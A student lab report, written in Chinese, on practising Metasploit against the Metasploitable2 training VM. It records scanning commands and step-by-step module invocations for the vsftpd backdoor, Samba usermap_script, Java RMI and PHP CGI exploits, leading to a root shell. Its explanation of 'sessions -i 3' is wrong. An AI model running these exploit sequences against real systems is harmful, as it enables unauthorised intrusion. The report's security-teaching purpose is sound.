20222427 2024-2025-1 《网络与系统攻防技术》实验六实验报告
1.实验内容
1.1 本周学习内容回顾
- 使用了Metasploit框架,其是一个功能强大的渗透测试框架。在使用的过程当中,Metasploit 提供了种类繁多的攻击模块,涵盖了远程代码执行、服务拒绝、提权等多种攻击方式,支持对多种操作系统和应用程序进行测试。除了漏洞利用,它还具备强大的后渗透功能,如键盘记录、文件上传下载、网络嗅探等。
- 其次还使用了一些信息收集的工具,如nmap,Nessus等,用于漏洞检测、信息收据等操作。
1.2 实验要求
本实践目标是掌握metasploit的用法。
指导书参考Rapid7官网的指导教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下载官方靶机Metasploitable2,完成下面实验内容。
查询靶机IP地址,得到结果为192.168.125.146
2.实验过程
2.1 前期渗透
2.1.1 主机发现(可用Aux中的arp_sweep,search一下就可以use)
search arp_sweep
use 0
set RHOSTS 192.168.125.0/24
set THREADS 30
exploit
从图中可以看到,我们已经成功的查询到靶机:192.168.125.146
2.1.2 端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等
search portscan/tcp
set ROHSTS 192.168.125.146
exploit
2.1.3 扫描系统版本、漏洞
search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.125.146
exploit
从图上可以看到,目标主机的操作系统是Unix,版本是Samba 3.0.20-Debain,且使用SMBv1,存在已知漏洞。
2.2 Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.125.146
exploit
攻击完以后,输入pwd、uname -a、id等指令检测是否攻击成功。
2.3 SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入
的话,就可能允许攻击者以nobody用户的权限执行任意命令。
search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.125.146
exploit
利用成功 执行uname–a验证
2.4 Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
首先,查看1099端口是否开放:
根据以前的TCP扫描得出的结果,可以得知1099端口已开放。
search exploit/multi/misc/java_rmi_server
use 0
show options //查看配置参数
set RHOST 192.168.125.146
exploit
执行攻击后,使用指令sessions -i 3进入任务
再输入shell,利用whoami指令验证,得到结果:root
2.5 PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.125.146
exploit
攻击成功,输入dir验证:
3.问题及解决方案
-
问题1:不知道指令:
sessions -i 3的含义与用法 -
问题1解决方案:通过在网上查询资料得知,这个指令就是可以显示session中的所有信息,这个3就是创建了多少个会话。
4.学习感悟、思考等
-
通过本次实验以及已完成的作业,我熟悉了
search-use-set-show-run/exploit这一套流程,从起始的陌生到如今的熟练,是每一次敲出这些指令所带来的经验。 -
通过攻击了几个不同系统的靶机,我认识到没有一个操作系统是没有漏洞的,可能只是人们还没有发现出来,所以在日常生活当中,我们要提高网络安全意识,在开每一个文件、每一个网页
之前,先想想是不是钓鱼网站或者有后门的文件,警惕高位文件!
